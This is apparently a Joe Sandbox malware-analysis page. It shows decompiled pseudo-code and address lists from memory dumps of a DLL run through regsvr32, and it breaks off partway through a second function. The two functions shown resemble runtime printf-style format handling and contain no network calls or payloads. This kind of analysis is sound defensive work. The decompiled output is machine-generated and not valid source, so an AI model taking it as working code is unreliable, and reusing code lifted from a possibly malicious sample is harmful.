                                                                                                              0x18002d1f4
                                                                                                              0x18002d1fa
                                                                                                              0x18002d204
                                                                                                              0x18002d20e
                                                                                                              0x18002d213
                                                                                                              0x18002d219
                                                                                                              0x18002d21f
                                                                                                              0x18002d229
                                                                                                              0x18002d231
                                                                                                              0x18002d236
                                                                                                              0x18002d23b
                                                                                                              0x18002d240
                                                                                                              0x18002d248
                                                                                                              0x18002d24d
                                                                                                              0x18002d256
                                                                                                              0x18002d25c
                                                                                                              0x18002d262
                                                                                                              0x18002d268
                                                                                                              0x18002d26e
                                                                                                              0x18002d274
                                                                                                              0x18002d27a
                                                                                                              0x18002d27f
                                                                                                              0x18002d283
                                                                                                              0x18002d285
                                                                                                              0x18002d28a
                                                                                                              0x18002d28c
                                                                                                              0x18002d293
                                                                                                              0x18002d29a
                                                                                                              0x18002d29c
                                                                                                              0x18002d2a7
                                                                                                              0x18002d2a9
                                                                                                              0x18002d2ad
                                                                                                              0x18002d2b2
                                                                                                              0x18002d2b5
                                                                                                              0x18002d2ba
                                                                                                              0x18002d2bc
                                                                                                              0x18002d2c1
                                                                                                              0x18002d2c3
                                                                                                              0x18002d2c9
                                                                                                              0x18002d2ce
                                                                                                              0x18002d2d0
                                                                                                              0x18002d2d5
                                                                                                              0x18002d2da
                                                                                                              0x18002d2de
                                                                                                              0x18002d2ea
                                                                                                              0x18002d2f3
                                                                                                              0x18002d2fd
                                                                                                              0x18002d303
                                                                                                              0x18002d308
                                                                                                              0x18002d30f
                                                                                                              0x18002d314
                                                                                                              0x18002d322
                                                                                                              0x18002d32c
                                                                                                              0x18002d332
                                                                                                              0x18002d337
                                                                                                              0x18002d33c
                                                                                                              0x18002d343
                                                                                                              0x18002d34c
                                                                                                              0x18002d34e
                                                                                                              0x18002d354
                                                                                                              0x18002d357
                                                                                                              0x18002d35b
                                                                                                              0x18002d36b
                                                                                                              0x18002d36f
                                                                                                              0x18002d378
                                                                                                              0x18002d37a
                                                                                                              0x18002d384
                                                                                                              0x18002d390
                                                                                                              0x18002d394
                                                                                                              0x18002d396
                                                                                                              0x18002d39f
                                                                                                              0x18002d3a5
                                                                                                              0x18002d3aa
                                                                                                              0x18002d3b3
                                                                                                              0x18002d3b7
                                                                                                              0x18002d3bd
                                                                                                              0x18002d3c1
                                                                                                              0x18002d3c7
                                                                                                              0x18002d3d3
                                                                                                              0x18002d3e5
                                                                                                              0x18002d3f2
                                                                                                              0x18002d40a
                                                                                                              0x18002d40c
                                                                                                              0x18002d418
                                                                                                              0x18002d41e
                                                                                                              0x18002d426
                                                                                                              0x18002d428
                                                                                                              0x18002d42a
                                                                                                              0x18002d432
                                                                                                              0x18002d43c
                                                                                                              0x18002d449
                                                                                                              0x18002d452
                                                                                                              0x18002d454
                                                                                                              0x18002d456
                                                                                                              0x18002d458
                                                                                                              0x18002d465
                                                                                                              0x18002d468
                                                                                                              0x18002d46b
                                                                                                              0x18002d47b
                                                                                                              0x18002d483
                                                                                                              0x18002d48f
                                                                                                              0x18002d49d
                                                                                                              0x18002d4a6
                                                                                                              0x18002d4c0
                                                                                                              0x18002d4c4
                                                                                                              0x18002d4c7
                                                                                                              0x18002d4cc
                                                                                                              0x18002d4d4
                                                                                                              0x18002d4d6
                                                                                                              0x18002d4d8
                                                                                                              0x18002d4df
                                                                                                              0x18002d4ea
                                                                                                              0x18002d4f0
                                                                                                              0x18002d4fa
                                                                                                              0x18002d4ff
                                                                                                              0x18002d511
                                                                                                              0x18002d513
                                                                                                              0x18002d51e
                                                                                                              0x18002d523
                                                                                                              0x18002d536
                                                                                                              0x18002d551
                                                                                                              0x18002d55b
                                                                                                              0x18002d56d
                                                                                                              0x18002d56f
                                                                                                              0x18002d572
                                                                                                              0x18002d574
                                                                                                              0x18002d57b
                                                                                                              0x18002d58c
                                                                                                              0x18002d58e
                                                                                                              0x18002d594
                                                                                                              0x18002d5a3
                                                                                                              0x18002d5b3
                                                                                                              0x18002d5c5
                                                                                                              0x18002d5ce
                                                                                                              0x18002d5e8
                                                                                                              0x18002d5ec
                                                                                                              0x18002d5ef
                                                                                                              0x18002d5f4
                                                                                                              0x18002d5fc
                                                                                                              0x18002d5fe
                                                                                                              0x18002d600
                                                                                                              0x18002d604
                                                                                                              0x18002d60a
                                                                                                              0x18002d613
                                                                                                              0x18002d624
                                                                                                              0x18002d62d
                                                                                                              0x18002d62f
                                                                                                              0x18002d632
                                                                                                              0x18002d637
                                                                                                              0x18002d645
                                                                                                              0x18002d64a
                                                                                                              0x18002d64f
                                                                                                              0x18002d67f

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6030846c4851cb75c1268620e0a79d6a89c157537bdfc3530be8bb6f4de5c816
                                                                                                              • Instruction ID: 9cb584a846f169228bbaac6197fa9e374df9ca447f0194b81601ad033fd1663d
                                                                                                              • Opcode Fuzzy Hash: 6030846c4851cb75c1268620e0a79d6a89c157537bdfc3530be8bb6f4de5c816
                                                                                                              • Instruction Fuzzy Hash: 6FE1BC3620064C86EBEBDE1990543E923A1F75DBD8F59C127AE89473D4CEB5CE8AC301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002D680 Relevance: .4, Instructions: 364COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 40%
                                                                                                              			E0000000118002D680(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				short _v64;
				char _v68;
				signed short _v72;
				long long _v88;
				void* __rdi;
				signed int _t131;
				void* _t133;
				void* _t139;
				void* _t176;
				unsigned int _t177;
				signed char _t178;
				signed short _t209;
				intOrPtr _t212;
				signed short _t221;
				void* _t222;
				signed long long _t291;
				long long _t307;
				long long _t309;
				long long _t310;
				intOrPtr* _t311;
				signed short* _t313;
				signed long long _t328;
				signed int* _t332;
				void* _t340;
				signed long long _t341;
				void* _t349;
				void* _t353;
				void* _t355;
				signed long long _t357;
				void* _t359;
				intOrPtr _t360;
				intOrPtr* _t361;

				_t353 = __r10;
				_t334 = __rbp;
				_t331 = __rsi;
				_t309 = __rcx;
				_t212 = __edi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t341 = _t340 - 0x50;
				_t291 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t291 ^ _t341;
				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t307 = __rcx;
				_t6 = _t331 - 0x20; // 0x58
				_t221 = _t6;
				_t7 = _t331 - 0x77; // 0x1
				r12d = _t7;
				_t222 = _t131 - 0x64;
				if (_t222 > 0) goto 0x8002d736;
				if (_t222 == 0) goto 0x8002d7a7;
				if (_t131 == 0x41) goto 0x8002d7b4;
				if (_t131 == 0x43) goto 0x8002d713;
				if (_t131 - 0x44 <= 0) goto 0x8002d7c0;
				if (_t131 - 0x47 <= 0) goto 0x8002d7b4;
				if (_t131 == 0x53) goto 0x8002d769;
				if (_t131 == _t221) goto 0x8002d729;
				if (_t131 == 0x5a) goto 0x8002d71f;
				if (_t131 == 0x61) goto 0x8002d7b4;
				if (_t131 != 0x63) goto 0x8002d7c0;
				0x80031710();
				goto 0x8002d7b9;
				E0000000118002F0F0(_t176, __rcx, __rcx, __rsi);
				goto 0x8002d7b9;
				_t133 = E0000000118001F334(r12b, __rcx, __rcx, _t331, __rbp);
				goto 0x8002d7b9;
				if (_t133 - 0x67 <= 0) goto 0x8002d7b4;
				if (_t133 == 0x69) goto 0x8002d7a7;
				if (_t133 == 0x6e) goto 0x8002d7a0;
				if (_t133 == 0x6f) goto 0x8002d780;
				if (_t133 == 0x70) goto 0x8002d770;
				if (_t133 == 0x73) goto 0x8002d769;
				if (_t133 == 0x75) goto 0x8002d7ab;
				if (_t133 != 0x78) goto 0x8002d7c0;
				goto 0x8002d72c;
				E00000001180032BA0(__rcx, __rcx, _t331, _t334, _t355);
				goto 0x8002d7b9;
				 *((intOrPtr*)(_t309 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t309 + 0x34)) = 0xb;
				goto 0x8002d729;
				_t177 =  *(_t309 + 0x28);
				if ((r12b & _t177 >> 0x00000005) == 0) goto 0x8002d794;
				asm("bts ecx, 0x7");
				 *(_t307 + 0x28) = _t177;
				_t310 = _t307;
				E0000000118001C324(0, _t307, _t310, _t331, _t334);
				goto 0x8002d7b9;
				E00000001180032114(_t307, _t310);
				goto 0x8002d7b9;
				 *(_t310 + 0x28) =  *(_t310 + 0x28) | 0x00000010;
				0x8001db2c();
				goto 0x8002d7b9;
				_t139 = E00000001180030618(0, _t212, _t307, _t310, _t334);
				r13d = 0;
				if (_t139 != 0) goto 0x8002d7c7;
				goto 0x8002db23;
				if ( *((intOrPtr*)(_t307 + 0x38)) != r13b) goto 0x8002db20;
				_t178 =  *(_t307 + 0x28);
				_v68 = 0;
				_v64 = 0;
				r10d = 0x20;
				if ((r12b & 0) == 0) goto 0x8002d825;
				if ((r12b & 0) == 0) goto 0x8002d807;
				_v68 = _t353 + 0xd;
				goto 0x8002d822;
				if ((r12b & _t178) == 0) goto 0x8002d813;
				goto 0x8002d800;
				if ((r12b & 0) == 0) goto 0x8002d825;
				_v68 = r10w;
				_t328 = _t357;
				_t209 =  *(_t307 + 0x3a) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t209 & 0x0000ffff) - _t221) != 0) goto 0x8002d848;
				r8b = r12b;
				if ((r12b & 0) != 0) goto 0x8002d84b;
				r8b = r13b;
				r9d = 0x30;
				if (r8b != 0) goto 0x8002d864;
				if (0 == 0) goto 0x8002d881;
				 *(_t341 + 0x34 + _t328 * 2) = r9w;
				if (_t209 == _t221) goto 0x8002d875;
				if (_t209 != 0x41) goto 0x8002d878;
				 *((short*)(_t341 + 0x36 + _t328 * 2)) = _t221 & 0x0000ffff;
				r15d =  *((intOrPtr*)(_t307 + 0x2c));
				r14d = 0xffff;
				r15d = r15d -  *((intOrPtr*)(_t307 + 0x48));
				r15d = r15d - _t212;
				if ((_t178 & 0x0000000c) != 0) goto 0x8002d8fc;
				if (r15d <= 0) goto 0x8002d8fc;
				if ((r12b &  *( *((intOrPtr*)(_t307 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002d8c2;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t307 + 0x460)) + 8)) == _t359) goto 0x8002d8e0;
				if (E000000011800414D8(r10d, _t307,  *((intOrPtr*)(_t307 + 0x460)),  *((intOrPtr*)(_t307 + 8)), _t349) == r14w) goto 0x8002d8f8;
				r10d = 0x20;
				 *(_t307 + 0x20) = _t310 + 1;
				if ( *(_t307 + 0x20) == 0xfffffffe) goto 0x8002d8fc;
				if (r13d + r12d - r15d < 0) goto 0x8002d8a3;
				goto 0x8002d8fc;
				 *(_t307 + 0x20) =  *(_t307 + 0x20) | 0xffffffff;
				_t361 = _t307 + 0x460;
				_t332 = _t307 + 0x20;
				if ((r12b &  *( *_t361 + 0x14) >> 0x0000000c) == 0) goto 0x8002d926;
				if ( *((intOrPtr*)( *_t361 + 8)) != _t359) goto 0x8002d926;
				 *_t332 =  *_t332 + _t212;
				goto 0x8002d93e;
				_v88 =  *((intOrPtr*)(_t307 + 8));
				r8d = _t212;
				_t311 = _t361;
				E000000011800362BC(_t307, _t311,  &_v68, _t332,  *((intOrPtr*)(_t307 + 8)), _t332);
				if ((r12b & 0) == 0) goto 0x8002d9a9;
				if ((r12b &  *(_t307 + 0x28) >> 0x00000002) != 0) goto 0x8002d9a9;
				if (r15d <= 0) goto 0x8002d9a9;
				if ((r12b &  *( *_t361 + 0x14) >> 0x0000000c) == 0) goto 0x8002d976;
				if ( *((intOrPtr*)( *_t361 + 8)) == _t359) goto 0x8002d990;
				if (E000000011800414D8(0x30, _t307,  *_t361,  *((intOrPtr*)(_t307 + 8)), _t332) == 0xffff) goto 0x8002d9a6;
				_t83 = _t311 + 1; // 0x10000
				 *_t332 = _t83;
				if ( *_t332 == 0xfffffffe) goto 0x8002d9a9;
				if (r13d + r12d - r15d < 0) goto 0x8002d95f;
				goto 0x8002d9a9;
				 *_t332 =  *_t332 | 0xffffffff;
				if ( *((intOrPtr*)(_t307 + 0x4c)) != r13b) goto 0x8002dada;
				if ( *((intOrPtr*)(_t307 + 0x48)) <= 0) goto 0x8002dada;
				_t360 =  *((intOrPtr*)(_t307 + 8));
				if ( *((intOrPtr*)(_t360 + 0x28)) != 0) goto 0x8002d9d7;
				0x800338e0();
				if ( *((intOrPtr*)(_t307 + 0x48)) == 0) goto 0x8002da5c;
				_t90 = _t360 + 0x18; // 0x4c08245c8948cccc
				_v72 = 0;
				_t313 =  &_v72;
				if (E00000001180040E3C(0, _t221, _t307, _t313,  *((intOrPtr*)(_t307 + 0x40)), _t328 + 2, _t332,  *((intOrPtr*)(_t307 + 0x40)),  *((intOrPtr*)( *_t90 + 8)),  *((intOrPtr*)(_t307 + 8))) <= 0) goto 0x8002dace;
				if (( *( *_t361 + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8002da2b;
				if ( *((long long*)( *_t361 + 8)) == 0) goto 0x8002da3d;
				if (E000000011800414D8(_v72 & 0x0000ffff, _t307,  *_t361,  *((intOrPtr*)(_t307 + 8)),  *((intOrPtr*)(_t307 + 8))) == 0xffff) goto 0x8002da42;
				 *(_t307 + 0x20) =  *(_t307 + 0x20) + 1;
				goto 0x8002da46;
				 *(_t307 + 0x20) =  *(_t307 + 0x20) | 0xffffffff;
				r12d = 1;
				if (0 + r12d !=  *((intOrPtr*)(_t307 + 0x48))) goto 0x8002d9e1;
				r13d = 0;
				if ( *_t332 - r13d < 0) goto 0x8002db20;
				if ((r12b & 0) == 0) goto 0x8002db20;
				if (r15d <= 0) goto 0x8002db20;
				if ((r12b &  *( *_t361 + 0x14) >> 0x0000000c) == 0) goto 0x8002da9e;
				if ( *((intOrPtr*)( *_t361 + 8)) == _t360) goto 0x8002dab8;
				if (E000000011800414D8(0x20, _t307,  *_t361,  *((intOrPtr*)(_t307 + 8)),  *((intOrPtr*)(_t307 + 8))) == 0xffff) goto 0x8002db1d;
				_t115 = _t313 + 1; // 0x10000
				 *_t332 = _t115;
				if ( *_t332 == 0xfffffffe) goto 0x8002db20;
				if (r13d + r12d - r15d < 0) goto 0x8002da87;
				goto 0x8002db20;
				 *(_t307 + 0x20) =  *(_t307 + 0x20) | 0xffffffff;
				r12d = 1;
				goto 0x8002da5c;
				r8d =  *((intOrPtr*)(_t307 + 0x48));
				if ((r12b &  *( *_t361 + 0x14) >> 0x0000000c) == 0) goto 0x8002db05;
				if ( *((intOrPtr*)( *_t361 + 8)) != _t360) goto 0x8002db05;
				 *_t332 =  *_t332 + r8d;
				goto 0x8002da5f;
				_v88 =  *((intOrPtr*)(_t307 + 8));
				E000000011800362BC(_t307, _t361,  *((intOrPtr*)(_t307 + 0x40)), _t332,  *((intOrPtr*)(_t307 + 0x40)) + _t165, _t332);
				goto 0x8002da5f;
				 *_t332 =  *_t332 | 0xffffffff;
				return E000000011800028F0(r12b,  *( *_t361 + 0x14) >> 0xc, _v56 ^ _t341);
			}





































                                                                                                              0x18002d680
                                                                                                              0x18002d680
                                                                                                              0x18002d680
                                                                                                              0x18002d680
                                                                                                              0x18002d680
                                                                                                              0x18002d680
                                                                                                              0x18002d685
                                                                                                              0x18002d68a
                                                                                                              0x18002d698
                                                                                                              0x18002d69c
                                                                                                              0x18002d6a6
                                                                                                              0x18002d6ab
                                                                                                              0x18002d6b4
                                                                                                              0x18002d6b7
                                                                                                              0x18002d6b7
                                                                                                              0x18002d6ba
                                                                                                              0x18002d6ba
                                                                                                              0x18002d6be
                                                                                                              0x18002d6c2
                                                                                                              0x18002d6c4
                                                                                                              0x18002d6ce
                                                                                                              0x18002d6d8
                                                                                                              0x18002d6de
                                                                                                              0x18002d6e8
                                                                                                              0x18002d6f2
                                                                                                              0x18002d6f7
                                                                                                              0x18002d6fd
                                                                                                              0x18002d703
                                                                                                              0x18002d70d
                                                                                                              0x18002d715
                                                                                                              0x18002d71a
                                                                                                              0x18002d71f
                                                                                                              0x18002d724
                                                                                                              0x18002d72c
                                                                                                              0x18002d731
                                                                                                              0x18002d73a
                                                                                                              0x18002d740
                                                                                                              0x18002d746
                                                                                                              0x18002d74c
                                                                                                              0x18002d752
                                                                                                              0x18002d758
                                                                                                              0x18002d75e
                                                                                                              0x18002d763
                                                                                                              0x18002d767
                                                                                                              0x18002d769
                                                                                                              0x18002d76e
                                                                                                              0x18002d770
                                                                                                              0x18002d777
                                                                                                              0x18002d77e
                                                                                                              0x18002d780
                                                                                                              0x18002d78b
                                                                                                              0x18002d78d
                                                                                                              0x18002d791
                                                                                                              0x18002d796
                                                                                                              0x18002d799
                                                                                                              0x18002d79e
                                                                                                              0x18002d7a0
                                                                                                              0x18002d7a5
                                                                                                              0x18002d7a7
                                                                                                              0x18002d7ad
                                                                                                              0x18002d7b2
                                                                                                              0x18002d7b4
                                                                                                              0x18002d7b9
                                                                                                              0x18002d7be
                                                                                                              0x18002d7c2
                                                                                                              0x18002d7cb
                                                                                                              0x18002d7d1
                                                                                                              0x18002d7d6
                                                                                                              0x18002d7dd
                                                                                                              0x18002d7e2
                                                                                                              0x18002d7f0
                                                                                                              0x18002d7fa
                                                                                                              0x18002d800
                                                                                                              0x18002d805
                                                                                                              0x18002d80a
                                                                                                              0x18002d811
                                                                                                              0x18002d81a
                                                                                                              0x18002d81c
                                                                                                              0x18002d822
                                                                                                              0x18002d825
                                                                                                              0x18002d829
                                                                                                              0x18002d839
                                                                                                              0x18002d83d
                                                                                                              0x18002d846
                                                                                                              0x18002d848
                                                                                                              0x18002d852
                                                                                                              0x18002d85e
                                                                                                              0x18002d862
                                                                                                              0x18002d864
                                                                                                              0x18002d86d
                                                                                                              0x18002d873
                                                                                                              0x18002d878
                                                                                                              0x18002d881
                                                                                                              0x18002d885
                                                                                                              0x18002d88b
                                                                                                              0x18002d88f
                                                                                                              0x18002d895
                                                                                                              0x18002d8a1
                                                                                                              0x18002d8b3
                                                                                                              0x18002d8c0
                                                                                                              0x18002d8d8
                                                                                                              0x18002d8da
                                                                                                              0x18002d8e6
                                                                                                              0x18002d8ec
                                                                                                              0x18002d8f4
                                                                                                              0x18002d8f6
                                                                                                              0x18002d8f8
                                                                                                              0x18002d900
                                                                                                              0x18002d90a
                                                                                                              0x18002d917
                                                                                                              0x18002d920
                                                                                                              0x18002d922
                                                                                                              0x18002d924
                                                                                                              0x18002d926
                                                                                                              0x18002d933
                                                                                                              0x18002d936
                                                                                                              0x18002d939
                                                                                                              0x18002d949
                                                                                                              0x18002d951
                                                                                                              0x18002d95d
                                                                                                              0x18002d96b
                                                                                                              0x18002d974
                                                                                                              0x18002d98e
                                                                                                              0x18002d992
                                                                                                              0x18002d995
                                                                                                              0x18002d99a
                                                                                                              0x18002d9a2
                                                                                                              0x18002d9a4
                                                                                                              0x18002d9a6
                                                                                                              0x18002d9ad
                                                                                                              0x18002d9b8
                                                                                                              0x18002d9be
                                                                                                              0x18002d9c8
                                                                                                              0x18002d9cd
                                                                                                              0x18002d9df
                                                                                                              0x18002d9e1
                                                                                                              0x18002d9ec
                                                                                                              0x18002d9f1
                                                                                                              0x18002da04
                                                                                                              0x18002da1f
                                                                                                              0x18002da29
                                                                                                              0x18002da3b
                                                                                                              0x18002da3d
                                                                                                              0x18002da40
                                                                                                              0x18002da42
                                                                                                              0x18002da49
                                                                                                              0x18002da5a
                                                                                                              0x18002da5c
                                                                                                              0x18002da62
                                                                                                              0x18002da71
                                                                                                              0x18002da81
                                                                                                              0x18002da93
                                                                                                              0x18002da9c
                                                                                                              0x18002dab6
                                                                                                              0x18002daba
                                                                                                              0x18002dabd
                                                                                                              0x18002dac2
                                                                                                              0x18002daca
                                                                                                              0x18002dacc
                                                                                                              0x18002dace
                                                                                                              0x18002dad2
                                                                                                              0x18002dad8
                                                                                                              0x18002dae1
                                                                                                              0x18002daf2
                                                                                                              0x18002dafb
                                                                                                              0x18002dafd
                                                                                                              0x18002db00
                                                                                                              0x18002db05
                                                                                                              0x18002db13
                                                                                                              0x18002db18
                                                                                                              0x18002db1d
                                                                                                              0x18002db4d

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48fc95ef34edeecbd711b5be0b31462975f4aed55ec2d77ad0e7b33a7d298762
                                                                                                              • Instruction ID: bb7e6342cc5d936864533e864b019376c3ef21b05198d1fc1f66badb99e38675
                                                                                                              • Opcode Fuzzy Hash: 48fc95ef34edeecbd711b5be0b31462975f4aed55ec2d77ad0e7b33a7d298762
                                                                                                              • Instruction Fuzzy Hash: 9AE1DE3620464D86EBEB9E1980503E923A1F748BD8F59D117AE85073D9DFB9CE8AC301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018002CCCC Relevance: .4, Instructions: 364COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 31%
                                                                                                              			E0000000118002CCCC(intOrPtr __edi, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				short _v64;
				char _v68;
				signed short _v72;
				long long _v88;
				void* __rdi;
				signed int _t131;
				void* _t134;
				void* _t138;
				void* _t175;
				unsigned int _t176;
				signed char _t177;
				signed short _t208;
				intOrPtr _t211;
				signed short _t220;
				void* _t221;
				signed long long _t290;
				long long _t306;
				long long _t308;
				long long _t309;
				intOrPtr* _t310;
				signed short* _t312;
				signed long long _t327;
				signed int* _t331;
				void* _t339;
				signed long long _t340;
				void* _t348;
				void* _t352;
				void* _t354;
				signed long long _t356;
				void* _t358;
				intOrPtr _t359;
				intOrPtr* _t360;

				_t352 = __r10;
				_t333 = __rbp;
				_t330 = __rsi;
				_t308 = __rcx;
				_t211 = __edi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t340 = _t339 - 0x50;
				_t290 =  *0x80070098; // 0xde2ac6aee6eb
				_v56 = _t290 ^ _t340;
				_t131 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t306 = __rcx;
				_t6 = _t330 - 0x20; // 0x58
				_t220 = _t6;
				_t7 = _t330 - 0x77; // 0x1
				r12d = _t7;
				_t221 = _t131 - 0x64;
				if (_t221 > 0) goto 0x8002cd82;
				if (_t221 == 0) goto 0x8002cdf3;
				if (_t131 == 0x41) goto 0x8002ce00;
				if (_t131 == 0x43) goto 0x8002cd5f;
				if (_t131 - 0x44 <= 0) goto 0x8002ce0c;
				if (_t131 - 0x47 <= 0) goto 0x8002ce00;
				if (_t131 == 0x53) goto 0x8002cdb5;
				if (_t131 == _t220) goto 0x8002cd75;
				if (_t131 == 0x5a) goto 0x8002cd6b;
				if (_t131 == 0x61) goto 0x8002ce00;
				if (_t131 != 0x63) goto 0x8002ce0c;
				E00000001180031554(_t131 - 0x63, __rcx, __rcx, __rsi);
				goto 0x8002ce05;
				E0000000118002EFDC(_t175, __rcx, __rcx, _t330);
				goto 0x8002ce05;
				_t134 = E0000000118001EF18(r12b, __rcx, __rcx, _t330, __rbp);
				goto 0x8002ce05;
				if (_t134 - 0x67 <= 0) goto 0x8002ce00;
				if (_t134 == 0x69) goto 0x8002cdf3;
				if (_t134 == 0x6e) goto 0x8002cdec;
				if (_t134 == 0x6f) goto 0x8002cdcc;
				if (_t134 == 0x70) goto 0x8002cdbc;
				if (_t134 == 0x73) goto 0x8002cdb5;
				if (_t134 == 0x75) goto 0x8002cdf7;
				if (_t134 != 0x78) goto 0x8002ce0c;
				goto 0x8002cd78;
				E00000001180032A54(__rcx, __rcx, _t330, _t333, _t354);
				goto 0x8002ce05;
				 *((intOrPtr*)(_t308 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t308 + 0x34)) = 0xb;
				goto 0x8002cd75;
				_t176 =  *(_t308 + 0x28);
				if ((r12b & _t176 >> 0x00000005) == 0) goto 0x8002cde0;
				asm("bts ecx, 0x7");
				 *(_t306 + 0x28) = _t176;
				_t309 = _t306;
				0x8001bf08();
				goto 0x8002ce05;
				0x80031f7c();
				goto 0x8002ce05;
				 *(_t309 + 0x28) =  *(_t309 + 0x28) | 0x00000010;
				0x8001d710();
				goto 0x8002ce05;
				_t138 = E00000001180030124(0, _t211, _t306, _t309, _t333);
				r13d = 0;
				if (_t138 != 0) goto 0x8002ce13;
				goto 0x8002d16f;
				if ( *((intOrPtr*)(_t306 + 0x38)) != r13b) goto 0x8002d16c;
				_t177 =  *(_t306 + 0x28);
				_v68 = 0;
				_v64 = 0;
				r10d = 0x20;
				if ((r12b & 0) == 0) goto 0x8002ce71;
				if ((r12b & 0) == 0) goto 0x8002ce53;
				_v68 = _t352 + 0xd;
				goto 0x8002ce6e;
				if ((r12b & _t177) == 0) goto 0x8002ce5f;
				goto 0x8002ce4c;
				if ((r12b & 0) == 0) goto 0x8002ce71;
				_v68 = r10w;
				_t327 = _t356;
				_t208 =  *(_t306 + 0x3a) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t208 & 0x0000ffff) - _t220) != 0) goto 0x8002ce94;
				r8b = r12b;
				if ((r12b & 0) != 0) goto 0x8002ce97;
				r8b = r13b;
				r9d = 0x30;
				if (r8b != 0) goto 0x8002ceb0;
				if (0 == 0) goto 0x8002cecd;
				 *(_t340 + 0x34 + _t327 * 2) = r9w;
				if (_t208 == _t220) goto 0x8002cec1;
				if (_t208 != 0x41) goto 0x8002cec4;
				 *((short*)(_t340 + 0x36 + _t327 * 2)) = _t220 & 0x0000ffff;
				r15d =  *((intOrPtr*)(_t306 + 0x2c));
				r14d = 0xffff;
				r15d = r15d -  *((intOrPtr*)(_t306 + 0x48));
				r15d = r15d - _t211;
				if ((_t177 & 0x0000000c) != 0) goto 0x8002cf48;
				if (r15d <= 0) goto 0x8002cf48;
				if ((r12b &  *( *((intOrPtr*)(_t306 + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002cf0e;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x460)) + 8)) == _t358) goto 0x8002cf2c;
				if (E000000011800414D8(r10d, _t306,  *((intOrPtr*)(_t306 + 0x460)),  *((intOrPtr*)(_t306 + 8)), _t348) == r14w) goto 0x8002cf44;
				r10d = 0x20;
				 *(_t306 + 0x20) = _t309 + 1;
				if ( *(_t306 + 0x20) == 0xfffffffe) goto 0x8002cf48;
				if (r13d + r12d - r15d < 0) goto 0x8002ceef;
				goto 0x8002cf48;
				 *(_t306 + 0x20) =  *(_t306 + 0x20) | 0xffffffff;
				_t360 = _t306 + 0x460;
				_t331 = _t306 + 0x20;
				if ((r12b &  *( *_t360 + 0x14) >> 0x0000000c) == 0) goto 0x8002cf72;
				if ( *((intOrPtr*)( *_t360 + 8)) != _t358) goto 0x8002cf72;
				 *_t331 =  *_t331 + _t211;
				goto 0x8002cf8a;
				_v88 =  *((intOrPtr*)(_t306 + 8));
				r8d = _t211;
				_t310 = _t360;
				E000000011800362BC(_t306, _t310,  &_v68, _t331,  *((intOrPtr*)(_t306 + 8)), _t331);
				if ((r12b & 0) == 0) goto 0x8002cff5;
				if ((r12b &  *(_t306 + 0x28) >> 0x00000002) != 0) goto 0x8002cff5;
				if (r15d <= 0) goto 0x8002cff5;
				if ((r12b &  *( *_t360 + 0x14) >> 0x0000000c) == 0) goto 0x8002cfc2;
				if ( *((intOrPtr*)( *_t360 + 8)) == _t358) goto 0x8002cfdc;
				if (E000000011800414D8(0x30, _t306,  *_t360,  *((intOrPtr*)(_t306 + 8)), _t331) == 0xffff) goto 0x8002cff2;
				_t83 = _t310 + 1; // 0x10000
				 *_t331 = _t83;
				if ( *_t331 == 0xfffffffe) goto 0x8002cff5;
